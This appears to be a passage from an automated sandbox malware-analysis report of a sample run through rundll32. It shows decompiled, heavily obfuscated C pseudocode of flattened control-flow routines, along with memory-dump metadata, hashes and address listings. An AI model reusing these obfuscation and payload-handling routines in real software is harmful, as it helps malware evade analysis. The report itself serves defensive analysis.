				_t9 =  &_v624; // 0x387e66
				_t188 = 0x2e;
				_v624 =  *_t9 * 0x13;
				_v624 = _v624 / _t188;
				_v624 = _v624 ^ 0x001972d5;
				_v644 = 0x433552;
				_v644 = _v644 + 0xffffa6b6;
				_v644 = _v644 ^ 0x94defa20;
				_v644 = _v644 << 1;
				_v644 = _v644 ^ 0x293db944;
				_v652 = 0xb70b59;
				_v652 = _v652 << 0xb;
				_v652 = _v652 + 0xffff8138;
				_t189 = 0x15;
				_v652 = _v652 / _t189;
				_v652 = _v652 ^ 0x08c5a62f;
				_v616 = 0xf4782f;
				_v616 = _v616 >> 0xa;
				_v616 = _v616 + 0xffff066a;
				_v616 = _v616 ^ 0xfff8c7bc;
				_v604 = 0x656560;
				_v604 = _v604 >> 3;
				_v604 = _v604 ^ 0x0000606f;
				_v648 = 0x377d9b;
				_t190 = 0x7f;
				_v648 = _v648 / _t190;
				_v648 = _v648 + 0xfd7f;
				_v648 = _v648 + 0xffff6b0a;
				_v648 = _v648 ^ 0x00006649;
				_v636 = 0x80cedd;
				_t191 = 0x58;
				_v636 = _v636 / _t191;
				_v636 = _v636 + 0x515e;
				_v636 = _v636 ^ 0x000b92de;
				_v620 = 0x65d9bd;
				_v620 = _v620 + 0xffff4b50;
				_v620 = _v620 ^ 0xd34cfccc;
				_v620 = _v620 ^ 0xd32e4bd2;
				_v632 = 0xb89e86;
				_v632 = _v632 + 0xffffcc79;
				_t192 = 0x2f;
				_v632 = _v632 / _t192;
				_v632 = _v632 ^ 0x00046a67;
				_v628 = 0xbb1c4a;
				_v628 = _v628 >> 6;
				_v628 = _v628 >> 9;
				_v628 = _v628 ^ 0x000a4ee8;
				_v640 = 0xfd7114;
				_v640 = _v640 << 5;
				_v640 = _v640 * 0x45;
				_v640 = _v640 + 0xa2ea;
				_v640 = _v640 ^ 0x89e0c310;
				_v612 = 0x26e293;
				_v612 = _v612 >> 0xd;
				_v612 = _v612 ^ 0x00050986;
				_t193 = _v612;
				do {
					while(_t162 != 0x249e110) {
						if(_t162 == 0x48c9d54) {
							_v556 = 0x22c;
							_t153 = E0038C15D(_t193, _v652, _v616,  &_v556, _v604);
							_t196 =  &(_t196[3]);
							asm("sbb ecx, ecx");
							_t167 =  ~_t153 & 0xf758a92f;
							L13:
							_t162 = _t167 + 0xe63f1a5;
							continue;
						}
						if(_t162 == 0x5bc9ad4) {
							_t156 = E00378E4D( &_v556,  &_v600);
							asm("sbb ecx, ecx");
							_t167 =  ~_t156 & 0xf3e5ef6b;
							goto L13;
						}
						if(_t162 == 0xac58df2) {
							_v576 = _t187;
							_t162 = 0xcf1a497;
							continue;
						}
						if(_t162 != 0xcf1a497) {
							if(_t162 == 0xe63f1a5) {
								return E00381E67(_v632, _v628, _v640, _v612, _t193);
							}
							goto L18;
						}
						_push(_t162);
						_t156 = E00375988(_t162, _v608);
						_t193 = _t156;
						if(_t156 != 0xffffffff) {
							_t162 = 0x48c9d54;
							continue;
						}
						L8:
						return _t156;
					}
					_t151 = E00372A58(_v648, _t193,  &_v556, _v636, _v620);
					_t196 =  &(_t196[3]);
					if(_t151 == 0) {
						_t162 = 0xe63f1a5;
						goto L18;
					} else {
						_t162 = 0x5bc9ad4;
						continue;
					}
					goto L8;
					L18:
				} while (_t162 != 0xad68edc);
				return _t156;
			}

































                                                                                                                                                            0x0037e2d6
                                                                                                                                                            0x0037e2dd
                                                                                                                                                            0x0037e2e4
                                                                                                                                                            0x0037e2e5
                                                                                                                                                            0x0037e2ea
                                                                                                                                                            0x0037e2ec
                                                                                                                                                            0x0037e2f1
                                                                                                                                                            0x0037e2f9
                                                                                                                                                            0x0037e2fc
                                                                                                                                                            0x0037e306
                                                                                                                                                            0x0037e30e
                                                                                                                                                            0x0037e313
                                                                                                                                                            0x0037e31b
                                                                                                                                                            0x0037e322
                                                                                                                                                            0x0037e325
                                                                                                                                                            0x0037e331
                                                                                                                                                            0x0037e335
                                                                                                                                                            0x0037e33d
                                                                                                                                                            0x0037e345
                                                                                                                                                            0x0037e34d
                                                                                                                                                            0x0037e355
                                                                                                                                                            0x0037e359
                                                                                                                                                            0x0037e361
                                                                                                                                                            0x0037e369
                                                                                                                                                            0x0037e36e
                                                                                                                                                            0x0037e37a
                                                                                                                                                            0x0037e37f
                                                                                                                                                            0x0037e385
                                                                                                                                                            0x0037e38d
                                                                                                                                                            0x0037e395
                                                                                                                                                            0x0037e39a
                                                                                                                                                            0x0037e3a2
                                                                                                                                                            0x0037e3aa
                                                                                                                                                            0x0037e3b2
                                                                                                                                                            0x0037e3b7
                                                                                                                                                            0x0037e3bf
                                                                                                                                                            0x0037e3cb
                                                                                                                                                            0x0037e3d0
                                                                                                                                                            0x0037e3d6
                                                                                                                                                            0x0037e3de
                                                                                                                                                            0x0037e3e6
                                                                                                                                                            0x0037e3ee
                                                                                                                                                            0x0037e3fa
                                                                                                                                                            0x0037e3ff
                                                                                                                                                            0x0037e405
                                                                                                                                                            0x0037e40d
                                                                                                                                                            0x0037e415
                                                                                                                                                            0x0037e41d
                                                                                                                                                            0x0037e425
                                                                                                                                                            0x0037e42d
                                                                                                                                                            0x0037e435
                                                                                                                                                            0x0037e43d
                                                                                                                                                            0x0037e449
                                                                                                                                                            0x0037e44c
                                                                                                                                                            0x0037e450
                                                                                                                                                            0x0037e458
                                                                                                                                                            0x0037e460
                                                                                                                                                            0x0037e46a
                                                                                                                                                            0x0037e474
                                                                                                                                                            0x0037e47c
                                                                                                                                                            0x0037e484
                                                                                                                                                            0x0037e48e
                                                                                                                                                            0x0037e492
                                                                                                                                                            0x0037e49a
                                                                                                                                                            0x0037e4a2
                                                                                                                                                            0x0037e4aa
                                                                                                                                                            0x0037e4af
                                                                                                                                                            0x0037e4b7
                                                                                                                                                            0x0037e4bb
                                                                                                                                                            0x0037e4bb
                                                                                                                                                            0x0037e4c9
                                                                                                                                                            0x0037e56a
                                                                                                                                                            0x0037e57d
                                                                                                                                                            0x0037e582
                                                                                                                                                            0x0037e589
                                                                                                                                                            0x0037e58b
                                                                                                                                                            0x0037e55b
                                                                                                                                                            0x0037e55b
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037e55b
                                                                                                                                                            0x0037e4d5
                                                                                                                                                            0x0037e54a
                                                                                                                                                            0x0037e553
                                                                                                                                                            0x0037e555
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037e555
                                                                                                                                                            0x0037e4dd
                                                                                                                                                            0x0037e532
                                                                                                                                                            0x0037e536
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037e536
                                                                                                                                                            0x0037e4e5
                                                                                                                                                            0x0037e4e9
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037e505
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037e4e9
                                                                                                                                                            0x0037e51b
                                                                                                                                                            0x0037e520
                                                                                                                                                            0x0037e525
                                                                                                                                                            0x0037e52c
                                                                                                                                                            0x0037e52e
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037e52e
                                                                                                                                                            0x0037e512
                                                                                                                                                            0x0037e512
                                                                                                                                                            0x0037e512
                                                                                                                                                            0x0037e5a6
                                                                                                                                                            0x0037e5ab
                                                                                                                                                            0x0037e5b0
                                                                                                                                                            0x0037e5bc
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037e5b2
                                                                                                                                                            0x0037e5b2
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037e5b2
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037e5be
                                                                                                                                                            0x0037e5be
                                                                                                                                                            0x00000000

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: If$R5C$^Q$`ee$f~8$o`$N
                                                                                                                                                            • API String ID: 0-3572798563
                                                                                                                                                            • Opcode ID: 1c1808546292c5ddace4df48c7fe15d144b20acd95025d433bf260c8050023d9
                                                                                                                                                            • Instruction ID: 94d1ee4ef7bea5a42ea936dc1309f7312eac3f98bf41a9cf9423364969325bde
                                                                                                                                                            • Opcode Fuzzy Hash: 1c1808546292c5ddace4df48c7fe15d144b20acd95025d433bf260c8050023d9
                                                                                                                                                            • Instruction Fuzzy Hash: 7C717872508301DFC369CF22C48945FBBE1EBC4768F508A5DF59A962A0D779CA09CF86
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 10014B71 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70libraryCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • _strcpy_s.LIBCMT ref: 10014B9E
                                                                                                                                                              • Part of subcall function 100311F4: __getptd_noexit.LIBCMT ref: 100311F4
                                                                                                                                                            • __snprintf_s.LIBCMT ref: 10014BD7
                                                                                                                                                              • Part of subcall function 1003119A: __vsnprintf_s_l.LIBCMT ref: 100311AF
                                                                                                                                                            • GetLocaleInfoA.KERNEL32(00000800,00000003,?,00000004), ref: 10014C02
                                                                                                                                                            • LoadLibraryA.KERNEL32(?), ref: 10014C25
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: InfoLibraryLoadLocale__getptd_noexit__snprintf_s__vsnprintf_s_l_strcpy_s
                                                                                                                                                            • String ID: LOC
                                                                                                                                                            • API String ID: 3864805678-519433814
                                                                                                                                                            • Opcode ID: 993ef955d11e1d056c0da4e243e940ae0abcf9c49e17b7ca6a81ba24efbb4c92
                                                                                                                                                            • Instruction ID: c6b9acf05ba5f485c5c472c95a6cc1a1d49ea65b07ecc8430683ae88ba63382e
                                                                                                                                                            • Opcode Fuzzy Hash: 993ef955d11e1d056c0da4e243e940ae0abcf9c49e17b7ca6a81ba24efbb4c92
                                                                                                                                                            • Instruction Fuzzy Hash: B011E471900118AFDB11DB64CC86BDD73B8EF09315F1241A1F7059F0A1EEB0E9859AD1
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 0037CF47 Relevance: 7.9, Strings: 6, Instructions: 380COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                            			E0037CF47(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr _a20) {
				char _v32;
				intOrPtr _v40;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v88;
				char* _v92;
				char _v112;
				char _v120;
				intOrPtr _v124;
				char _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				void* _t345;
				void* _t377;
				void* _t378;
				void* _t386;
				void* _t393;
				intOrPtr _t403;
				intOrPtr* _t406;
				void* _t408;
				signed char* _t414;
				signed char* _t450;
				intOrPtr* _t455;
				intOrPtr _t456;
				intOrPtr _t457;
				void* _t458;
				signed char* _t459;
				signed int _t460;
				signed int _t461;
				signed int _t462;
				signed int _t463;
				signed int _t464;
				signed int _t465;
				signed int _t466;
				signed int _t467;
				signed int _t468;
				signed int _t469;
				void* _t470;
				void* _t471;
				void* _t474;

				_t406 = _a8;
				_t456 = _a4;
				_push(_a20);
				_t455 = _a16;
				_push(_t455);
				_push(_a12);
				_push(_t406);
				_push(_t456);
				_push(__edx);
				_push(__ecx);
				E003820B9(_t345);
				_v256 = 0xcf1dac;
				_t471 = _t470 + 0x1c;
				_v256 = _v256 ^ 0x662b1d0f;
				_v256 = _v256 << 2;
				_t408 = 0x8e80a37;
				_v256 = _v256 + 0xffff9089;
				_v256 = _v256 ^ 0x9b8f9315;
				_v160 = 0x25617a;
				_v160 = _v160 << 2;
				_v160 = _v160 ^ 0x009585a8;
				_v264 = 0x39e017;
				_v264 = _v264 + 0xffffbc9c;
				_v264 = _v264 ^ 0xb11c7ead;
				_v264 = _v264 + 0xffffd7b2;
				_v264 = _v264 ^ 0xb125b990;
				_v240 = 0xb82586;
				_t460 = 0x74;
				_v240 = _v240 / _t460;
				_v240 = _v240 << 1;
				_t461 = 0x3b;
				_v132 = _v132 & 0x00000000;
				_v240 = _v240 * 0x36;
				_v240 = _v240 ^ 0x00aace1a;
				_v180 = 0xcab8fe;
				_v180 = _v180 ^ 0xca9451c5;
				_v180 = _v180 | 0x3e03c42f;
				_v180 = _v180 ^ 0xfe5c53ad;
				_v248 = 0x57862;
				_v248 = _v248 | 0x3f7dcfba;
				_v248 = _v248 / _t461;
				_t462 = 0x62;
				_v248 = _v248 / _t462;
				_v248 = _v248 ^ 0x00057d9a;
				_v252 = 0x68f561;
				_v252 = _v252 << 6;
				_v252 = _v252 >> 0xd;
				_v252 = _v252 | 0x3cddc102;
				_v252 = _v252 ^ 0x3cda88f2;
				_v192 = 0x7c8e99;
				_v192 = _v192 + 0x829c;
				_v192 = _v192 * 0x31;
				_v192 = _v192 ^ 0x17fda794;
				_v228 = 0x74d91a;
				_v228 = _v228 << 3;
				_v228 = _v228 + 0x7502;
				_v228 = _v228 * 0x63;
				_v228 = _v228 ^ 0x69a7ce60;
				_v208 = 0xc909ae;
				_v208 = _v208 << 1;
				_t463 = 0xb;
				_v208 = _v208 / _t463;
				_v208 = _v208 ^ 0x00276772;
				_v164 = 0x673800;
				_v164 = _v164 << 9;
				_v164 = _v164 ^ 0xce7e8a93;
				_v232 = 0xb859bd;
				_v232 = _v232 + 0xde76;
				_t464 = 0x5b;
				_v232 = _v232 * 0x1c;
				_v232 = _v232 * 0x30;
				_v232 = _v232 ^ 0xcc63b0a7;
				_v172 = 0x7eda56;
				_v172 = _v172 << 3;
				_v172 = _v172 ^ 0x03f50911;
				_v184 = 0x2f7891;
				_v184 = _v184 / _t464;
				_t465 = 0x41;
				_v184 = _v184 * 0x49;
				_v184 = _v184 ^ 0x0024fbf7;
				_v148 = 0x4a0bea;
				_v148 = _v148 ^ 0x502016f1;
				_v148 = _v148 ^ 0x506ad42a;
				_v260 = 0x9ebd58;
				_v260 = _v260 >> 8;
				_v260 = _v260 << 0xf;
				_v260 = _v260 + 0xb306;
				_v260 = _v260 ^ 0x4f54a3e8;
				_v204 = 0xce3506;
				_v204 = _v204 << 0xf;
				_v204 = _v204 << 0xc;
				_v204 = _v204 ^ 0x300ddb73;
				_v244 = 0xe7c592;
				_v244 = _v244 >> 5;
				_v244 = _v244 ^ 0x506a7775;
				_v244 = _v244 << 1;
				_v244 = _v244 ^ 0xa0d2afa7;
				_v268 = 0x1d8a79;
				_v268 = _v268 << 2;
				_v268 = _v268 / _t465;
				_v268 = _v268 | 0x253986a4;
				_v268 = _v268 ^ 0x2531568a;
				_v216 = 0x116531;
				_t466 = 0x61;
				_v216 = _v216 * 0x66;
				_v216 = _v216 ^ 0xfffdc9ed;
				_v216 = _v216 ^ 0xf917010b;
				_v200 = 0xc05f9c;
				_v200 = _v200 / _t466;
				_v200 = _v200 * 0x6f;
				_v200 = _v200 ^ 0x00dca3d1;
				_v212 = 0xdb89ea;
				_v212 = _v212 >> 0xa;
				_v212 = _v212 >> 9;
				_v212 = _v212 ^ 0x0000ad8d;
				_v152 = 0x38fb70;
				_v152 = _v152 ^ 0x310cc67b;
				_v152 = _v152 ^ 0x313af23a;
				_v136 = 0x7e2008;
				_v136 = _v136 ^ 0x7ad3030b;
				_v136 = _v136 ^ 0x7aaaa86e;
				_v196 = 0x9c4278;
				_t467 = 0x4e;
				_v196 = _v196 * 0x7e;
				_v196 = _v196 ^ 0xa26962db;
				_v196 = _v196 ^ 0xee89d9da;
				_v220 = 0x1e88f4;
				_v220 = _v220 >> 4;
				_v220 = _v220 >> 7;
				_v220 = _v220 ^ 0x000c14cc;
				_v140 = 0xc2e6ba;
				_v140 = _v140 + 0x8875;
				_v140 = _v140 ^ 0x00c43ba1;
				_v188 = 0xdb74c;
				_v188 = _v188 << 4;
				_v188 = _v188 * 0x5c;
				_v188 = _v188 ^ 0x4edda20a;
				_v236 = 0x62ea5;
				_v236 = _v236 / _t467;
				_v236 = _v236 >> 0xb;
				_v236 = _v236 ^ 0x7372adb3;
				_v236 = _v236 ^ 0x73757ff2;
				_v144 = 0x2b6271;
				_v144 = _v144 ^ 0x1ac7dce1;
				_v144 = _v144 ^ 0x1ae73668;
				_v224 = 0x8bb898;
				_v224 = _v224 + 0x43a9;
				_v224 = _v224 << 0x10;
				_t468 = 0x71;
				_t469 = _v132;
				_v224 = _v224 / _t468;
				_v224 = _v224 ^ 0x023712cd;
				_v156 = 0xb23c07;
				_v156 = _v156 + 0x4ded;
				_v156 = _v156 ^ 0x00b7ca1c;
				_v168 = 0xb501ce;
				_v168 = _v168 ^ 0x6706c67f;
				_v168 = _v168 ^ 0x67b3c7a1;
				_v176 = 0xab8984;
				_v176 = _v176 * 0x22;
				_v176 = _v176 ^ 0x16c84308;
				goto L1;
				do {
					while(1) {
						L1:
						_t474 = _t408 - 0xd9acfaa;
						if(_t474 > 0) {
							break;
						}
						if(_t474 == 0) {
							E00388519(_v236, _v144, _v128);
							_t408 = 0xfbb751f;
							continue;
						}
						if(_t408 == 0x15a913b) {
							_v40 = _t456;
							_v92 =  &_v32;
							_v56 =  *_t455;
							_v52 =  *((intOrPtr*)(_t455 + 4));
							_v88 = 0x20;
							_t393 = E00377735(_v192,  &_v112,  &_v120, _v228, _v208);
							_t471 = _t471 + 0x10;
							if(_t393 == 0) {
								L20:
								return _v132;
							}
							_t408 = 0xf0a856e;
							continue;
						}
						if(_t408 == 0x3749e66) {
							_t469 = E00380AE0(_v176, _v168);
							_t408 = 0x46acfc9;
							 *((intOrPtr*)(_t406 + 4)) = _v160 + _v124 + _t469;
							continue;
						}
						if(_t408 == 0x46acfc9) {
							_push(_t408);
							_push(_t408);
							_t403 = E00377FF2( *((intOrPtr*)(_t406 + 4)));
							 *_t406 = _t403;
							if(_t403 == 0) {
								_t408 = 0xd9acfaa;
							} else {
								_v132 = 1;
								_t408 = 0xfb3baa2;
							}
							continue;
						}
						if(_t408 != 0x8e80a37) {
							goto L31;
						}
						_t408 = 0xfac38db;
					}
					if(_t408 == 0xf0a856e) {
						_t377 = E003770B3(_v164,  &_v128,  &_v120, _v232, _v172);
						_t471 = _t471 + 0xc;
						if(_t377 == 0) {
							_t408 = 0xfbb751f;
							goto L31;
						}
						_t408 = 0x3749e66;
						goto L1;
					}
					if(_t408 == 0xfac38db) {
						_push( *_t455);
						_t378 = E0038AE6D(_v240,  &_v32,  *((intOrPtr*)(_t455 + 4)), _v180, _t408, _v248);
						_t471 = _t471 + 0x14;
						if(_t378 == 0) {
							goto L20;
						}
						_t408 = 0x15a913b;
						goto L1;
					}
					if(_t408 == 0xfb3baa2) {
						_t457 =  *_t406;
						E00377E87(_v268, _v216, _v200, _t457);
						_t458 = _t457 + _v264;
						E0037ED7E(_v212, _t458, _v152, _v128, _v124);
						_t459 = _t458 + _v124;
						E0037A492(_v196, _v220, _t459, _t469);
						_t450 =  &(_t459[_t469]);
						_t471 = _t471 + 0x20;
						_t414 = _t459;
						if(_t459 >= _t450) {
							L25:
							_t386 = E00380AE0(0xe, 0);
							_t408 = 0xd9acfaa;
							 *((char*)(_t386 + _t459)) = 0;
							_t456 = _a4;
							goto L1;
						} else {
							goto L22;
						}
						do {
							L22:
							if(( *_t414 & 0x000000ff) == _v256) {
								 *_t414 = 0xc3;
							}
							_t414 =  &(_t414[1]);
						} while (_t414 < _t450);
						goto L25;
					}
					if(_t408 != 0xfbb751f) {
						goto L31;
					}
					E00388519(_v224, _v156, _v120);
					goto L20;
					L31:
				} while (_t408 != 0x5927677);
				goto L20;
			}












































































                                                                                                                                                            0x0037cf4e
                                                                                                                                                            0x0037cf57
                                                                                                                                                            0x0037cf5f
                                                                                                                                                            0x0037cf66
                                                                                                                                                            0x0037cf6d
                                                                                                                                                            0x0037cf6e
                                                                                                                                                            0x0037cf75
                                                                                                                                                            0x0037cf76
                                                                                                                                                            0x0037cf77
                                                                                                                                                            0x0037cf78
                                                                                                                                                            0x0037cf79
                                                                                                                                                            0x0037cf7e
                                                                                                                                                            0x0037cf86
                                                                                                                                                            0x0037cf89
                                                                                                                                                            0x0037cf93
                                                                                                                                                            0x0037cf98
                                                                                                                                                            0x0037cf9d
                                                                                                                                                            0x0037cfa5
                                                                                                                                                            0x0037cfad
                                                                                                                                                            0x0037cfb8
                                                                                                                                                            0x0037cfc0
                                                                                                                                                            0x0037cfcb
                                                                                                                                                            0x0037cfd3
                                                                                                                                                            0x0037cfdb
                                                                                                                                                            0x0037cfe3
                                                                                                                                                            0x0037cfeb
                                                                                                                                                            0x0037cff3
                                                                                                                                                            0x0037d001
                                                                                                                                                            0x0037d006
                                                                                                                                                            0x0037d00c
                                                                                                                                                            0x0037d015
                                                                                                                                                            0x0037d018
                                                                                                                                                            0x0037d020
                                                                                                                                                            0x0037d024
                                                                                                                                                            0x0037d02c
                                                                                                                                                            0x0037d034
                                                                                                                                                            0x0037d03c
                                                                                                                                                            0x0037d044
                                                                                                                                                            0x0037d04c
                                                                                                                                                            0x0037d054
                                                                                                                                                            0x0037d064
                                                                                                                                                            0x0037d06c
                                                                                                                                                            0x0037d06f
                                                                                                                                                            0x0037d073
                                                                                                                                                            0x0037d07b
                                                                                                                                                            0x0037d083
                                                                                                                                                            0x0037d088
                                                                                                                                                            0x0037d08d
                                                                                                                                                            0x0037d095
                                                                                                                                                            0x0037d09d
                                                                                                                                                            0x0037d0a5
                                                                                                                                                            0x0037d0b2
                                                                                                                                                            0x0037d0b6
                                                                                                                                                            0x0037d0be
                                                                                                                                                            0x0037d0c6
                                                                                                                                                            0x0037d0cb
                                                                                                                                                            0x0037d0d8
                                                                                                                                                            0x0037d0dc
                                                                                                                                                            0x0037d0e4
                                                                                                                                                            0x0037d0ec
                                                                                                                                                            0x0037d0f8
                                                                                                                                                            0x0037d0fd
                                                                                                                                                            0x0037d103
                                                                                                                                                            0x0037d10b
                                                                                                                                                            0x0037d116
                                                                                                                                                            0x0037d11e
                                                                                                                                                            0x0037d129
                                                                                                                                                            0x0037d131
                                                                                                                                                            0x0037d13e
                                                                                                                                                            0x0037d141
                                                                                                                                                            0x0037d14a
                                                                                                                                                            0x0037d14e
                                                                                                                                                            0x0037d156
                                                                                                                                                            0x0037d15e
                                                                                                                                                            0x0037d163
                                                                                                                                                            0x0037d16b
                                                                                                                                                            0x0037d17b
                                                                                                                                                            0x0037d184
                                                                                                                                                            0x0037d187
                                                                                                                                                            0x0037d18b
                                                                                                                                                            0x0037d193
                                                                                                                                                            0x0037d19e
                                                                                                                                                            0x0037d1a9
                                                                                                                                                            0x0037d1b4
                                                                                                                                                            0x0037d1bc
                                                                                                                                                            0x0037d1c1
                                                                                                                                                            0x0037d1c6
                                                                                                                                                            0x0037d1ce
                                                                                                                                                            0x0037d1d6
                                                                                                                                                            0x0037d1de
                                                                                                                                                            0x0037d1e3
                                                                                                                                                            0x0037d1e8
                                                                                                                                                            0x0037d1f0
                                                                                                                                                            0x0037d1f8
                                                                                                                                                            0x0037d1fd
                                                                                                                                                            0x0037d205
                                                                                                                                                            0x0037d209
                                                                                                                                                            0x0037d211
                                                                                                                                                            0x0037d219
                                                                                                                                                            0x0037d226
                                                                                                                                                            0x0037d22a
                                                                                                                                                            0x0037d232
                                                                                                                                                            0x0037d23a
                                                                                                                                                            0x0037d247
                                                                                                                                                            0x0037d248
                                                                                                                                                            0x0037d24c
                                                                                                                                                            0x0037d254
                                                                                                                                                            0x0037d25c
                                                                                                                                                            0x0037d26a
                                                                                                                                                            0x0037d273
                                                                                                                                                            0x0037d277
                                                                                                                                                            0x0037d27f
                                                                                                                                                            0x0037d287
                                                                                                                                                            0x0037d28c
                                                                                                                                                            0x0037d291
                                                                                                                                                            0x0037d299
                                                                                                                                                            0x0037d2a4
                                                                                                                                                            0x0037d2af
                                                                                                                                                            0x0037d2ba
                                                                                                                                                            0x0037d2c5
                                                                                                                                                            0x0037d2d0
                                                                                                                                                            0x0037d2db
                                                                                                                                                            0x0037d2ec
                                                                                                                                                            0x0037d2ef
                                                                                                                                                            0x0037d2f3
                                                                                                                                                            0x0037d2fb
                                                                                                                                                            0x0037d303
                                                                                                                                                            0x0037d30b
                                                                                                                                                            0x0037d310
                                                                                                                                                            0x0037d315
                                                                                                                                                            0x0037d31d
                                                                                                                                                            0x0037d328
                                                                                                                                                            0x0037d333
                                                                                                                                                            0x0037d33e
                                                                                                                                                            0x0037d346
                                                                                                                                                            0x0037d350
                                                                                                                                                            0x0037d354
                                                                                                                                                            0x0037d35c
                                                                                                                                                            0x0037d36c
                                                                                                                                                            0x0037d370
                                                                                                                                                            0x0037d375
                                                                                                                                                            0x0037d37d
                                                                                                                                                            0x0037d385
                                                                                                                                                            0x0037d390
                                                                                                                                                            0x0037d39b
                                                                                                                                                            0x0037d3a6
                                                                                                                                                            0x0037d3ae
                                                                                                                                                            0x0037d3b6
                                                                                                                                                            0x0037d3bf
                                                                                                                                                            0x0037d3c2
                                                                                                                                                            0x0037d3c9
                                                                                                                                                            0x0037d3cd
                                                                                                                                                            0x0037d3d5
                                                                                                                                                            0x0037d3e0
                                                                                                                                                            0x0037d3eb
                                                                                                                                                            0x0037d3f6
                                                                                                                                                            0x0037d3fe
                                                                                                                                                            0x0037d406
                                                                                                                                                            0x0037d40e
                                                                                                                                                            0x0037d41b
                                                                                                                                                            0x0037d41f
                                                                                                                                                            0x0037d41f
                                                                                                                                                            0x0037d427
                                                                                                                                                            0x0037d427
                                                                                                                                                            0x0037d427
                                                                                                                                                            0x0037d427
                                                                                                                                                            0x0037d42d
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037d433
                                                                                                                                                            0x0037d553
                                                                                                                                                            0x0037d559
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037d559
                                                                                                                                                            0x0037d43f
                                                                                                                                                            0x0037d4e3
                                                                                                                                                            0x0037d4f6
                                                                                                                                                            0x0037d4ff
                                                                                                                                                            0x0037d509
                                                                                                                                                            0x0037d51f
                                                                                                                                                            0x0037d52b
                                                                                                                                                            0x0037d530
                                                                                                                                                            0x0037d535
                                                                                                                                                            0x0037d5a7
                                                                                                                                                            0x0037d5b8
                                                                                                                                                            0x0037d5b8
                                                                                                                                                            0x0037d537
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037d537
                                                                                                                                                            0x0037d44b
                                                                                                                                                            0x0037d4b7
                                                                                                                                                            0x0037d4cb
                                                                                                                                                            0x0037d4d0
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037d4d0
                                                                                                                                                            0x0037d453
                                                                                                                                                            0x0037d477
                                                                                                                                                            0x0037d478
                                                                                                                                                            0x0037d479
                                                                                                                                                            0x0037d47e
                                                                                                                                                            0x0037d484
                                                                                                                                                            0x0037d498
                                                                                                                                                            0x0037d486
                                                                                                                                                            0x0037d486
                                                                                                                                                            0x0037d491
                                                                                                                                                            0x0037d491
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037d484
                                                                                                                                                            0x0037d45b
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037d461
                                                                                                                                                            0x0037d461
                                                                                                                                                            0x0037d569
                                                                                                                                                            0x0037d6ac
                                                                                                                                                            0x0037d6b1
                                                                                                                                                            0x0037d6b6
                                                                                                                                                            0x0037d6c2
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037d6c2
                                                                                                                                                            0x0037d6b8
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037d6b8
                                                                                                                                                            0x0037d575
                                                                                                                                                            0x0037d65b
                                                                                                                                                            0x0037d674
                                                                                                                                                            0x0037d679
                                                                                                                                                            0x0037d67e
                                                                                                                                                            0x00000000
